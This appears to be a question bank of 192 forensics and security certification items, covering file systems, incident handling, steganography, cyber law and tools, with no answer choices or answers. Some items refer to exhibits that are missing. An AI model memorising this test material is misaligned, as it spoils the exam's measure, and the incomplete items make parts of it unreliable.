Question1: John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He traceroutes the We-are-secure server and gets the following result:

Considering the above traceroute result, which of the following statements can be true?
Each correct answer represents a complete solution. Choose all that apply.
Question2: You work as a professional Computer Hacking Forensic Investigator. A project has been assigned to you to investigate the DoS attack on a computer network of SecureEnet Inc. Which of the following methods will you perform to accomplish the task?
Each correct answer represents a complete solution. Choose all that apply.
Question3: You want to change the attribute of a file named ACE.TXT to Hidden. Which command line will enable you to set the attribute?
Question4: Which of the following U.S. Federal laws addresses computer crime activities in communication lines, stations, or systems?
Question5: Which of the following files starts the initialization process in booting sequence of the Linux operating system?
Question6: Which two technologies should research groups use for secure VPN access while traveling? (Click the Exhibit button on the toolbar to see the case study.)
Each correct answer represents a complete solution. Choose two.
Question7: Which of the following is a set of exclusive rights granted by a state to an inventor or his assignee for a fixed period of time in exchange for the disclosure of an invention?
Question8: Which of the following is used for remote file access by UNIX/Linux systems?
Question9: John works as a Network Security Professional. He is assigned a project to test the security of www.we- are-secure.com. He is working on the Linux operating system and wants to install an Intrusion Detection System on the We-are-secure server so that he can receive alerts about any hacking attempts. Which of the following tools can John use to accomplish the task?
Each correct answer represents a complete solution. Choose all that apply.
Question10: John is a black hat hacker. FBI arrested him while performing some email scams. Under which of the following US laws will john be charged?
Question11: Which of the following attacks saturates network resources and disrupts services to a specific computer?
Question12: Which of the following types of attack can guess a hashed password?
Question13: You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to query an image root device and RAM disk size. Which of the following Unix commands can you use to accomplish the task?
Question14: Which of the following are the primary goals of the incident handling team?
Each correct answer represents a complete solution. Choose all that apply.
Question15: Which of the following NIST RA process steps has the goal to identify the potential threat-sources and compile a threat statement listing the potential threat-sources that are applicable to the IT system being evaluated?
Question16: Which of the following are the two different file formats in which Microsoft Outlook saves e-mail messages based on system configuration?
Each correct answer represents a complete solution. Choose two.
Question17: Which of the following statutes is enacted in the U.S., which prohibits creditors from collecting data from applicants, such as national origin, caste, religion etc?
Question18: John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He enters the following command on the Linux terminal:
chmod 741 secure.c
Considering the above scenario, which of the following statements are true?
Each correct answer represents a complete solution. Choose all that apply.
Question19: In which of the following security tests does the security testing team simulate as an employee or other person with an authorized connection to the organization's network?
Question20: Which of the following file systems contains hardware settings of a Linux computer?
Question21: In 2001, the Council of Europe passed a convention on cybercrime. It was the first international treaty seeking to address computer crime and Internet crimes by harmonizing national laws, improving investigative techniques, and increasing cooperation among nations. On 1 March 2006, the Additional Protocol to the Convention on Cybercrime came into force. Which of the following statements clearly describes this protocol?
Question22: Your friend plans to install a Trojan on your computer. He knows that if he gives you a new version of chess.exe, you will definitely install the game on your computer. He picks up a Trojan and joins it to chess.exe. The size of chess.exe was 526,895 bytes originally, and after joining this chess file to the Trojan, the file size increased to 651,823 bytes. When he gives you this new game, you install the infected chess.exe file on your computer. He now performs various malicious tasks on your computer remotely. But you suspect that someone has installed a Trojan on your computer and begin to investigate it. When you enter the netstat command in the command prompt, you get the following results:
C:\WINDOWS>netstat -an | find "UDP"
UDP IP_Address:31337 *:*
Now you check the following registry address:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices In the above address, you notice a 'default' key in the 'Name' field having " .exe" value in the corresponding 'Data' field. Which of the following Trojans do you think your friend may have installed on your computer on the basis of the above evidence?
Question23: You work as a Network Administrator for NetTech Inc. The company has a network that consists of 200 client computers and ten database servers. One morning, you find that an unauthorized user is accessing data on a database server on the network. Which of the following actions will you take to preserve the evidences?
Each correct answer represents a complete solution. Choose three.
Question24: Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him by the chief security officer of a cloth manufacturing company who suspects that one of the employees is selling the design of the clothes outside the company. The security officer asked Adam to investigate the iPhone of the employee, as he suspects that there might be some sensitive information stored in his iPhone. On investigation Adam found out that the employee tries to destroy the evidence on his iPhone.
He presses and holds the Home and Power buttons until the device is forced into recovery mode. Which of the following actions occurred when iPhone is set into recovery mode?
Question25: Which of the following type of file systems is not supported by Linux kernel?
Question26: Mark works as a Network Administrator for Net Perfect Inc. The company has a Linux-based network.
Mark installs a Checkpoint Firewall NGX on a SecurePlatform device. He performs a scheduled backup of his system settings and products configuration. Where are these backup files stored?
Each correct answer represents a complete solution. Choose all that apply.
Question27: You work as a Computer Hacking Forensic Investigator for SecureNet Inc. You want to investigate Cross- Site Scripting attack on your company's Website. Which of the following methods of investigation can you use to accomplish the task?
Each correct answer represents a complete solution. Choose all that apply.
Question28: When you start your computer, Windows operating system reports that the hard disk drive has bad sectors. What will be your first step in resolving this issue?
Question29: Which of the following two cryptography methods are used by NTFS Encrypting File System (EFS) to encrypt the data stored on a disk on a file-by-file basis?
Question30: Which of the following enables an inventor to legally enforce his right to exclude others from using his invention?
Question31: Victor works as a professional Ethical Hacker for SecureEnet Inc. He has been assigned a job to test an image, in which some secret information is hidden, using Steganography. Victor performs the following techniques to accomplish the task:
1. Smoothening and decreasing contrast by averaging the pixels of the area where significant color transitions occurs.
2. Reducing noise by adjusting color and averaging pixel value.
3. Sharpening, Rotating, Resampling, and Softening the image.
Which of the following Steganography attacks is Victor using?
Question32: You work as a Network Administrator for Net World International. You want to configure a Windows 2000 computer to dual boot with Windows 98. The hard disk drive of the computer will be configured as a single partition drive. Which of the following file systems will you use to accomplish this?
Question33: The MBR of a hard disk is a collection of boot records that contain disk information such as disk architecture, cluster size, and so on. The main work of the MBR is to locate and run necessary operating system files that are required to run a hard disk. In the context of the operating system, MBR is also known as the boot loader. Which of the following viruses can infect the MBR of a hard disk?
Each correct answer represents a complete solution. Choose two.
Question34: You work as a Network Administrator for NetTech Inc. The company's network is connected to the Internet.
For security, you want to restrict unauthorized access to the network with minimum administrative effort.
You want to implement a hardware-based solution. What will you do to accomplish this?
Question35: Which of the following is the Windows feature on which the file management can be performed by a PC user?
Question36: Which of the following provides high availability of data?
Question37: Adam works as a Security Administrator for Umbrella Inc. He is responsible for securing all 15 servers of the company. To successfully accomplish the task, he enables the hardware and software firewalls and disables all unnecessary services on all the servers. Sales manager of the company asks Adam to run emulation software on one of the servers that requires the telnet service to function properly. Adam is concerned about the security of the server, as telnet can be a very large security risk in an organization.
Adam decides to perform some footprinting, scanning, and penetration testing on the server to checkon the server to check the security. Adam telnets into the server and writes the following command:
HEAD / HTTP/1.0
After pressing enter twice, Adam gets the following results:

Which of the following tasks has Adam just accomplished?
Question38: Which of the following is a file management tool?
Question39: You are the Network Administrator and your company has recently implemented encryption for all emails.
You want to check to make sure that the email packages are being encrypted. What tool would you use to accomplish this?
Question40: Which of the following tools works by using standard set of MS-DOS commands and can create an MD5 hash of an entire drive, partition, or selected files?
Question41: You work as a Network Administrator for Net World International. Rick, a Sales Manager, complains that his Windows 98 computer is not displaying the taskbar. You reboot his computer and find that the taskbar is still missing. How will you resolve the issue?
Question42: By gaining full control of router, hackers often acquire full control of the network. Which of the following methods are commonly used to attack Routers?
Each correct answer represents a complete solution. Choose all that apply.
Question43: Which of the following files in LILO booting process of Linux operating system stores the location of Kernel on the hard drive?
Question44: Normally, RAM is used for temporary storage of data. But sometimes RAM data is stored in the hard disk, what is this method called?
Question45: Sam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a compromised system, which runs on Linux operating system. Sam wants to investigate and review local software, system libraries, and other application installed on the system.
Which of the following directories in Linux will he review to accomplish the task?
Question46: Which of the following file systems provides integrated security?
Question47: You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to run a command that forces all the unwritten blocks in the buffer cache to be written to the disk. Which of the following Unix commands can you use to accomplish the task?
Question48: John used to work as a Network Administrator for We-are-secure Inc. Now he has resigned from the company for personal reasons. He wants to send out some secret information of the company. To do so, he takes an image file and simply uses a tool image hide and embeds the secret file within an image file of the famous actress, Jennifer Lopez, and sends it to his Yahoo mail id. Since he is using the image file to send the data, the mail server of his company is unable to filter this mail. Which of the following techniques is he performing to accomplish his task?
Question49: Which of the following steps should be performed in order to optimize a system performance?
Each correct answer represents a complete solution. Choose three.
Question50: Which of the following file systems cannot be used to install an operating system on the hard disk drive?
Each correct answer represents a complete solution. Choose two.
Question51: Which of the following methods is used by forensic investigators to acquire an image over the network in a secure manner?
Question52: Which of the following file systems are supported by Windows 2000 operating systems?
Each correct answer represents a complete solution. Choose all that apply.
Question53: Sandra wants to create a full system state backup of her computer, which is running on Microsoft Windows XP operating system. Which of the following is saved in full state system backup?
Each correct answer represents a complete solution. Choose all that apply.
Question54: Based on the case study, to implement more security, which of the following additional technologies should you implement for laptop computers?
(Click the Exhibit button on the toolbar to see the case study.)
Each correct answer represents a complete solution. Choose two.
Question55: You are responsible for maintaining and troubleshooting PC's at your company. The receptionist reports her screen has gone blue. When you get there you notice the 'blue screen of death' with an error message NTFS_FILE_SYSTEM. What is the most likely cause of this error?
Question56: Which of the following statements about the compression feature of the NTFS file system are true?
Each correct answer represents a complete solution. Choose two.
Question57: Which of the following steps are generally followed in computer forensic examinations?
Each correct answer represents a complete solution. Choose three.
Question58: Victor works as a professional Ethical Hacker for SecureNet Inc. He wants to use Steganographic file system method to encrypt and hide some secret information. Which of the following disk spaces will he use to store this secret information?
Each correct answer represents a complete solution. Choose all that apply.
Question59: Which of the following data is NOT listed as a volatile data in RFC 3227 list for Windows based system?
Question60: Which of the following encryption methods uses AES technology?
Question61: Which of the following is NOT an example of passive footprinting?
Question62: In a Windows 98 computer, which of the following utilities is used to convert a FAT16 partition to FAT32?
Question63: Adam works as a professional Computer Hacking Forensic Investigator, a project has been assigned to him to investigate and examine files present on suspect's computer. Adam uses a tool with the help of which he can examine recovered deleted files, fragmented files, and other corrupted data. He can also examine the data, which was captured from the network, and access the physical RAM, and any processes running in virtual memory with the help of this tool. Which of the following tools is Adam using?
Question64: Which of the following directories contains administrative commands and daemon processes in the Linux operating system?
Question65: The incident response team has turned the evidence over to the forensic team. Now, it is the time to begin looking for the ways to improve the incident response process for next time. What are the typical areas for improvement?
Each correct answer represents a complete solution. Choose all that apply.
Question66: Which of the following types of firewall ensures that the packets are part of the established session?
Question67: Which of the following wireless network standards operates on the 5 GHz band and transfers data at a rate of 54 Mbps?
Question68: Which of the following commands is used to enforce checking of a file system even if the file system seems to be clean?
Question69: Rick works as a Network Administrator for uCertify Inc. He takes a backup of some important compressed files on an NTFS partition, using the Windows 2000 Backup utility. Rick restores these files in a FAT32 partition. He finds that the restored files do not have the compression attribute. What is the most likely cause?
Question70: You work as a Network Security Analyzer. You got a suspicious email while working on a forensic project.
Now, you want to know the IP address of the sender so that you can analyze various information such as the actual location, domain information, operating system being used, contact information, etc. of the email sender with the help of various tools and resources. You also want to check whether this email is fake or real. You know that analysis of email headers is a good starting point in such cases. The email header of the suspicious email is given below:

What is the IP address of the sender of this email?
Question71: In which of the following files does the Linux operating system store passwords?
Question72: Which of the following layers protocols handles file transfer and network management?
Question73: Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a compromised system of a cyber criminal, who hides some information in his computer.
This computer runs on Linux operating system. Adam wants to extract the data units of a file, which is specified by its meta-data address. He is using the Sleuth Kit for this purpose. Which of the following commands in the Sleuth kit will he use to accomplish the task?
Question74: Which of the following types of firewall functions at the Session layer of OSI model?
Question75: Which of the following types of evidence is considered as the best evidence?
Question76: You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to fix partitions on a hard drive. Which of the following Unix commands can you use to accomplish the task?
Question77: Mark is taking a data backup during non-working hours from a remote computer on the network by using the Backup utility. What will he do to ensure that the backup has no errors?
Question78: Which of the following command line tools are available in Helix Live acquisition tool on Windows?
Each correct answer represents a complete solution. Choose all that apply.
Question79: Which of the following sections of an investigative report covers the background and summary of the report including the outcome of the case and the list of allegations?
Question80: A firewall is a combination of hardware and software, used to provide security to a network. It is used to protect an internal network or intranet against unauthorized access from the Internet or other outside networks. It restricts inbound and outbound access and can analyze all traffic between an internal network and the Internet. Users can configure a firewall to pass or block packets from specific IP addresses and ports. Which of the following tools works as a firewall for the Linux 2.4 kernel?
Question81: You work as a Network Administrator for Net World International. You have configured the hard disk drive of your computer as shown in the image below:

The computer is configured to dual-boot with Windows 2000 Server and Windows 98. While working on Windows 2000 Server, you save a file on the 6GB partition. You are unable to find the file while working on Windows 98. You are not even able to access the partition on which the file is saved. What is the most likely cause?
Question82: Which of the following tools are used to determine the hop counts of an IP packet?
Each correct answer represents a complete solution. Choose two.
Question83: You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to set the hard disk geometry parameters, cylinders, heads, and sectors. Which of the following Unix commands can you use to accomplish the task?
Question84: Joseph works as a Software Developer for WebTech Inc. He wants to protect the algorithms and the techniques of programming that he uses in developing an application. Which of the following laws are used to protect a part of software?
Question85: Which of the following parameters is NOT used for calculating the capacity of the hard disk?
Question86: Which of the following prevents malicious programs from attacking a system?
Question87: You work as a Forensic Investigator. Which of the following rules will you follow while working on a case?
Each correct answer represents a part of the solution. Choose all that apply.
Question88: Which of the following types of virus makes changes to a file system of a disk?
Question89: You use the FAT16 file system on your Windows 98 computer. You want to upgrade to the FAT32 file system. What is the advantage of the FAT32 file system over FAT16 file system?
Each correct answer represents a complete solution. Choose two.
Question90: Which of the following statements is true for a file in the UNIX operating system?
Question91: Which of the following Acts enacted in United States amends Civil Rights Act of 1964, providing technical changes affecting the length of time allowed to challenge unlawful seniority provisions, to sue the federal government for discrimination and to bring age discrimination claims?
Question92: Which of the following is used to store configuration settings and options on Microsoft Windows operating systems?
Question93: Joseph works as a Web Designer for WebTech Inc. He creates a Web site and wants to protect it from lawsuits. Which of the following steps will he take to accomplish the task?
Each correct answer represents a part of the solution. Choose all that apply.
Question94: You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to print the super block and block the group information for the filesystem present on a system.
Which of the following Unix commands can you use to accomplish the task?
Question95: Which of the following anti-child pornography organizations helps local communities to create programs and develop strategies to investigate child exploitation?
Question96: Which of the following commands is used to create or delete partitions on Windows XP?
Question97: Which of the following Windows XP system files handles memory management, I/O operations, and interrupts?
Question98: You work as a Web developer for ABC Inc. You want to investigate the Cross-Site Scripting attack on your company's Web site. Which of the following methods of investigation can you use to accomplish the task?
Each correct answer represents a complete solution. Choose all that apply.
Question99: Which of the following Linux file systems is a journaled file system?
Question100: Which of the following is a password-cracking program?
Question101: The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm?
Question102: Adam works as a Computer Hacking Forensic Investigator for a garment company in the United States. A project has been assigned to him to investigate a case of a disloyal employee who is suspected of stealing design of the garments, which belongs to the company and selling those garments of the same design under different brand name. Adam investigated that the company does not have any policy related to the copy of design of the garments. He also investigated that the trademark under which the employee is selling the garments is almost identical to the original trademark of the company. On the grounds of which of the following laws can the employee be prosecuted?
Question103: Which of the following password cracking attacks is based on a pre-calculated hash table to retrieve plain text passwords?
Question104: Which of the following protocols allows computers on different operating systems to share files and disk storage?
Question105: Which of the following fsck commands will you use to check all filesystems listed in /etc/fstab?
Question106: Which of the following directories in Linux operating system contains device files, which refers to physical devices?
Question107: John works as a contract Ethical Hacker. He has recently got a project to do security checking for www.we-are-secure.com. He wants to find out the operating system of the we-are-secure server in the information gathering step. Which of the following commands will he use to accomplish the task?
Each correct answer represents a complete solution. Choose two.
Question108: Which of the following are the benefits of information classification for an organization?
Each correct answer represents a complete solution. Choose two.
Question109: Adam works as a Computer Hacking Forensic Investigator. He has been assigned a project to investigate child pornography. As the first step, Adam found that the accused is using a Peer-to-peer application to network different computers together over the internet and sharing pornographic materials of children with others. Which of the following are Peer-to-Peer applications?
Each correct answer represents a complete solution. Choose all that apply.
Question110: Which of the following terms refers to a mechanism which proves that the sender really sent a particular message?
Question111: You are responsible for tech support at your company. You have been instructed to make certain that all desktops support file and folder encryption. Which file system should you use when installing Windows XP?
Question112: Adam works as a professional Computer Hacking Forensic Investigator. He works with the local police. A project has been assigned to him to investigate an iPod, which was seized from a student of the high school. It is suspected that the explicit child pornography contents are stored in the iPod. Adam wants to investigate the iPod extensively. Which of the following operating systems will Adam use to carry out his investigations in more extensive and elaborate manner?
Question113: Which of the following switches is used with Pslist command on the command line to show the statistics for all active threads on the system, grouping these threads with their owning process?
Question114: Mark is the Administrator of a Linux computer. He wants to check the status of failed Telnet-based login attempts on the Linux computer. Which of the following shell commands will he use to accomplish the task?
Question115: You work as a Network Administrator for McNeel Inc. You want to encrypt each user's MY DOCUMENTS folder. You decide to use Encrypting File System (EFS). You plan to write a script for encryption. Which of the following tools will you use to encrypt specified folders?
Question116: Adam works as a Security Administrator for Umbrella Technology Inc. He reported a breach in security to his senior members, stating that "security defenses has been breached and exploited for 2 weeks by hackers." The hackers had accessed and downloaded 50,000 addresses containing customer credit cards and passwords. Umbrella Technology was looking to law enforcement officials to protect their intellectual property. The intruder entered through an employee's home machine, which was connected to Umbrella Technology's corporate VPN network. The application called BEAST Trojan was used in the attack to open a "back door" allowing the hackers undetected access. The security breach was discovered when customers complained about the usage of their credit cards without their knowledge. The hackers were traced back to Shanghai, China through e-mail address evidence. The credit card information was sent to that same e-mail address. The passwords allowed the hackers to access Umbrella Technology's network from a remote location, posing as employees.
Which of the following actions can Adam perform to prevent such attacks from occurring in future?
Question117: Brutus is a password cracking tool that can be used to crack the following authentications:
HTTP (Basic Authentication)

HTTP (HTML Form/CGI)

POP3 (Post Office Protocol v3)

FTP (File Transfer Protocol)

SMB (Server Message Block)

Telnet

Which of the following attacks can be performed by Brutus for password cracking?
Each correct answer represents a complete solution. Choose all that apply.
Question118: Which of the following is included in a memory dump file?
Question119: Which of the following describes software technologies that improve portability, manageability, and compatibility of applications by encapsulating them from the underlying operating system on which they are executed?
Question120: Which of the following is the correct order of digital investigations Standard Operating Procedure (SOP)?
Question121: Which of the following graphical tools is used to navigate through directory structures?
Question122: You want to upgrade a partition in your computer's hard disk drive from FAT to NTFS. Which of the following DOS commands will you use to accomplish this?
Question123: Which of the following types of evidence proves or disproves a specific act through oral testimony based on information gathered through the witness's five senses?
Question124: You work as a Network Administrator for Tech Perfect Inc. The company has a Linux-based network.
Users complain that they are unable to access resources on the network. However, there was no such problem the previous day. They are receiving the following error messages regularly:
Unable to resolve host name
As your primary step for resolving the issue, which of the following services will you verify whether it is running or not?
Question125: Which of the following uses hard disk drive space to provide extra memory for a computer?
Question126: Which of the following statements are NOT true about volume boot record or Master Boot Record?
Each correct answer represents a complete solution. Choose all that apply.
Question127: Nathan works as a Computer Hacking Forensic Investigator for SecureEnet Inc. He uses Visual TimeAnalyzer software to track all computer usage by logging into individual users account or specific projects and compile detailed accounts of time spent within each program. Which of the following functions are NOT performed by Visual TimeAnalyzer?
Each correct answer represents a complete solution. Choose all that apply.
Question128: Which of the following are advantages of NTFS file system over FAT32 and FAT?
Each correct answer represents a part of the solution. Choose two.
Question129: Which of the following is the process of overwriting all addressable locations on a disk?
Question130: Which of the following commands can you use to create an ext3 file system?
Each correct answer represents a complete solution. Choose two.
Question131: Adam works as a professional Computer Hacking Forensic Investigator. He has been assigned with the project of investigating an iPod, which is suspected to contain some explicit material. Adam wants to connect the compromised iPod to his system, which is running on Windows XP (SP2) operating system.
He doubts that connecting the iPod with his computer may change some evidences and settings in the iPod. He wants to set the iPod to read-only mode. This can be done by changing the registry key within the Windows XP (SP2) operating system. Which of the following registry keys will Adam change to accomplish the task?
Question132: You work as a Network Administrator for Blue Bell Inc. You want to install Windows XP Professional on your computer, which already has Windows Me installed. You want to configure your computer to dual boot between Windows Me and Windows XP Professional. You have a single 40GB hard disk.
Which of the following file systems will you choose to dual-boot between the two operating systems?
Question133: This type of virus infects programs that can execute and load into memory to perform predefined steps for infecting systems. It infects files with the extensions .EXE, .COM, .BIN, and .SYS. As it can replicate or destroy these types of files, the operating system becomes corrupted and needs reinstallation. This type of virus is known as __________.
Question134: Which of the following standard technologies is not used to interface hard disk with the computer?
Question135: You work as a Network Administrator for Perfect Solutions Inc. You install Windows 98 on a computer. By default, which of the following folders does Windows 98 setup use to keep the registry tools?
Question136: In Linux, which of the following files describes the processes that are started up during boot up?
Question137: Which of the following statements is NOT true about FAT16 file system?
Each correct answer represents a complete solution. Choose all that apply.
Question138: Which of the following diagnostic codes sent by POST to the internal port h80 refers to the system board error?
Question139: Allen works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a computer, which is used by the suspect to sexually harass the victim using instant messenger program. Suspect's computer runs on Windows operating system. Allen wants to recover password from instant messenger program, which suspect is using, to collect the evidence of the crime.
Allen is using Helix Live for this purpose. Which of the following utilities of Helix will he use to accomplish the task?
Question140: You work as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network.
You are creating a user account by using the USERADD command. Which of the following entries cannot be used for specifying a user ID?
Each correct answer represents a complete solution. Choose all that apply.
Question141: Which of the following refers to the ability to ensure that the data is not modified or tampered with?
Question142: Which of the following statements about SD cards are true?
Each correct answer represents a complete solution. Choose two.
Question143: You work as a Network Administrator for Web World Inc. You want to host an e-commerce Web site on your network. You want to ensure that storage of credit card information is secure. Which of the following conditions should be met to accomplish this?
Each correct answer represents a complete solution. Choose all that apply.
Question144: You work as a Network Administrator for NetTech Inc. To ensure the security of files, you encrypt data files using Encrypting File System (EFS). You want to make a backup copy of the files and maintain security settings. You can backup the files either to a network share or a floppy disk. What will you do to accomplish this?
Question145: Peter works as a Computer Hacking Forensic Investigator for SecureEnet Inc. He has been assigned with a project of investigating a disloyal employee who is accused of stealing secret data from the company and selling it to the competitor company. Peter is required to collect proper evidences and information to present before the court for prosecution. Which of the following parameters is necessary for successful prosecution of this corporate espionage?
Question146: Adam works as a professional Computer Hacking Forensic Investigator with the local police of his area. A project has been assigned to him to investigate a PDA seized from a local drug dealer. It is expected that many valuable and important information are stored in this PDA. Adam follows investigative methods, which are required to perform in a pre-defined sequential manner for the successful forensic investigation of the PDA. Which of the following is the correct order to perform forensic investigation of PDA?
Question147: Which of the following statements about an extended partition are true?
Each correct answer represents a complete solution. Choose two.
Question148: Which of the following tools is used to locate lost files and partitions to restore data from a formatted, damaged, or lost partition in Windows and Apple Macintosh computers?
Question149: Which of the following files contains the salted passwords in the Linux operating system?
Question150: Which of the following is the process of comparing cryptographic hash functions of system executables and configuration files?
Question151: Which of the following Acts enacted in United States allows the FBI to issue National Security Letters (NSLs) to Internet service providers (ISPs) ordering them to disclose records about their customers?
Question152: Every network device contains a unique built in Media Access Control (MAC) address, which is used to identify the authentic device to limit the network access. Which of the following addresses is a valid MAC address?
Question153: Maria works as a professional Ethical Hacker. She recently got a project to test the security of www.we- are-secure.com. Arrange the three pre-test phases of the attack to test the security of weare-secure.
Select and Place:

Question154: Which of the following evidences are the collection of facts that, when considered together, can be used to infer a conclusion about the malicious activity/person?
Question155: Peter works as a Computer Hacking Forensic Investigator. He has been called by an organization to conduct a seminar to give necessary information related to sexual harassment within the work place. Peter started with the definition and types of sexual harassment. He then wants to convey that it is important that records of the sexual harassment incidents should be maintained, which helps in further legal prosecution.
Which of the following data should be recorded in this documentation?
Each correct answer represents a complete solution. Choose all that apply.
Question156: Your Windows XP hard drive has 2 partitions. The system partition is NTFS and the other is FAT. You wish to encrypt a folder created on the system partition for the purpose of data security. Which of the following statements is true about this situation?
Question157: A Web-based credit card company had collected financial and personal details of Mark before issuing him a credit card. The company has now provided Mark's financial and personal details to another company.
Which of the following Internet laws has the credit card issuing company violated?
Question158: Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate the BlackBerry, which is suspected to be used to hide some important information.
Which of the following is the first step taken to preserve the information in forensic investigation of the BlackBerry?
Question159: John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He wants to test the effect of a virus on the We-are-secure server. He injects the virus on the server and, as a result, the server becomes infected with the virus even though an established antivirus program is installed on the server. Which of the following do you think are the reasons why the antivirus installed on the server did not detect the virus injected by John?
Each correct answer represents a complete solution. Choose all that apply.
Question160: Which status is a problem, assigned when its cause has been recognized?
Question161: Adam works as a Security Analyst for Umbrella Inc. He suspects that a virus exists in the network of the company. He scanned the client system with latest signature-based anti-virus, but no productive results have been obtained. Adam suspects that a polymorphic virus exists in the network. Which of the following statements are true about the polymorphic virus?
Each correct answer represents a complete solution. Choose all that apply.
Question162: Which of the following file systems supports the hot fixing feature?
Question163: You are the Security Consultant and have been hired to check security for a client's network. Your client has stated that he has many concerns but the most critical is the security of Web applications on their Web server. What should be your highest priority then in checking his network?
Question164: John works as a Technical Support Executive in ABC Inc. The company's network consists of ten computers with Windows XP professional installed on all of them. John is working with a computer on which he has enabled hibernation. He shuts down his computer using hibernation mode. Which of the following will happen to the data after powering off the system using hibernation?
Question165: Which of the following registry hives contains information about all users who have logged on to the system?
Question166: Adam works as an Incident Handler for Umbrella Inc. He is informed by the senior authorities that the server of the marketing department has been affected by a malicious hacking attack. Supervisors are also claiming that some sensitive data are also stolen. Adam immediately arrived to the server room of the marketing department and identified the event as an incident. He isolated the infected network from the remaining part of the network and started preparing to image the entire system. He captures volatile data, such as running process, ram, and network connections.
Which of the following steps of the incident handling process is being performed by Adam?
Question167: You work as a professional Computer Hacking Forensic Investigator. A project has been assigned to you to investigate Plagiarism occurred in the source code files of C#. Which of the following tools will you use to detect the software plagiarism?
Question168: Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate an iphone, which is being seized from a criminal. The local police suspect that this iphone contains some sensitive information. Adam knows that the storage partition of the iphone is divided into two partitions. The first partition is used for the operating system. Other data of iphone is stored in the second partition. Which of the following is the name with which the second partition is mounted on the iphone?
Question169: Which of the following firewalls depends on the three-way handshake of the TCP protocol?
Question170: Which of the following is a documentation of guidelines that computer forensics experts use to handle evidences?
Question171: Convention on Cybercrime, created by the Council of Europe, is the treaty seeking to address Computer crime and Internet crimes by harmonizing national laws, improving investigative techniques, and increasing cooperation among nations. Which of the following chapters of Convention of Cybercrime contains the provisions for mutual assistances and extradition rules related to cybercrimes?
Question172: Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a multimedia enabled mobile phone, which is suspected to be used in a cyber crime.
Adam uses a tool, with the help of which he can recover deleted text messages, photos, and call logs of the mobile phone. Which of the following tools is Adam using?
Question173: Which of the following is described in the following statement?
"It is a 512 bytes long boot sector that is the first sector of a default boot drive. It is also known as Volume Boot Sector, if the boot drive is un-partitioned. "
Question174: You work as a Network Administrator for a bank. For securing the bank's network, you configure a firewall and an IDS. In spite of these security measures, intruders are able to attack the network. After a close investigation, you find that your IDS is not configured properly and hence is unable to generate alarms when needed. What type of response is the IDS giving?
Question175: Which of the following registry hives stores information about the file extensions that are mapped to their corresponding applications?
Question176: John works as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. John is working as a root user on the Linux operating system. Which of the following commands will John use to display information about all mounted file systems?
Each correct answer represents a complete solution. Choose all that apply.
Question177: Which of the following sections of United States Economic Espionage Act of 1996 criminalizes the misappropriation of trade secrets related to or included in a product that is produced for or placed in interstate commerce, with the knowledge or intent that the misappropriation will injure the owner of the trade secret?
Question178: Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate computer of an unfaithful employee of SecureEnet Inc. Suspect's computer runs on Windows operating system. Which of the following sources will Adam investigate on a Windows host to collect the electronic evidences?
Each correct answer represents a complete solution. Choose all that apply.
Question179: Which of the following statements are true about Compact Disc (CD) and Digital Versatile Disk (DVD)?
Each correct answer represents a complete solution. Choose all that apply.
Question180: Sandra, a novice computer user, works on Windows environment. She experiences some problem regarding bad sectors formed in a hard disk of her computer. She wants to run CHKDSK command to check the hard disk for bad sectors and to fix the errors, if any, occurred. Which of the following switches will she use with CHKDSK command to accomplish the task?
Question181: Which of the following statements about the HKEY_LOCAL_MACHINE registry hive is true?
Question182: You are working with a team that will be bringing in new computers to a sales department at a company.
The sales team would like to keep not only their old files, but system settings as well on the new PC's.
What should you do?
Question183: Which of the following standard file formats is used by Apple's iPod to store contact information?
Question184: Which of the following statements is NOT true about the file slack spaces in Windows operating system?
Question185: In which of the following access control models can a user not grant permissions to other users to see a copy of an object marked as secret that he has received, unless they have the appropriate permissions?
Question186: Which of the following tools can be used by a user to hide his identity?
Each correct answer represents a complete solution. Choose all that apply.
Question187: Which of the following components are usually found in an Intrusion detection system (IDS)?
Each correct answer represents a complete solution. Choose two.
Question188: Peter works as a Technical Representative in a CSIRT for SecureEnet Inc. His team is called to investigate the computer of an employee, who is suspected for classified data theft. Suspect's computer runs on Windows operating system. Peter wants to collect data and evidences for further analysis. He knows that in Windows operating system, the data is searched in pre-defined steps for proper and efficient analysis.
Which of the following is the correct order for searching data on a Windows based system?
Question189: You are handling technical support calls for an insurance company. A user calls you complaining that he cannot open a file, and that the file name appears in green while opening in Windows Explorer.
What does this mean?
Question190: John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He has successfully completed the following pre-attack phases while testing the security of the server:
Footprinting

Scanning

Now he wants to conduct the enumeration phase. Which of the following tools can John use to conduct it?
Each correct answer represents a complete solution. Choose all that apply.
Question191: Adam works as a Computer Hacking Forensic Investigator in a law firm. He has been assigned with his first project. Adam collected all required evidences and clues. He is now required to write an investigative report to present before court for further prosecution of the case. He needs guidelines to write an investigative report for expressing an opinion. Which of the following are the guidelines to write an investigative report in an efficient way?
Each correct answer represents a complete solution. Choose all that apply.
Question192: Adrian, the Network Administrator for Peach Tree Inc., wants to install a new computer on the company's network. He asks his assistant to make a boot disk with minimum files. The boot disk will be used to boot the computer, which does not have an operating system installed, yet. Which of the following files will he include on the disk?
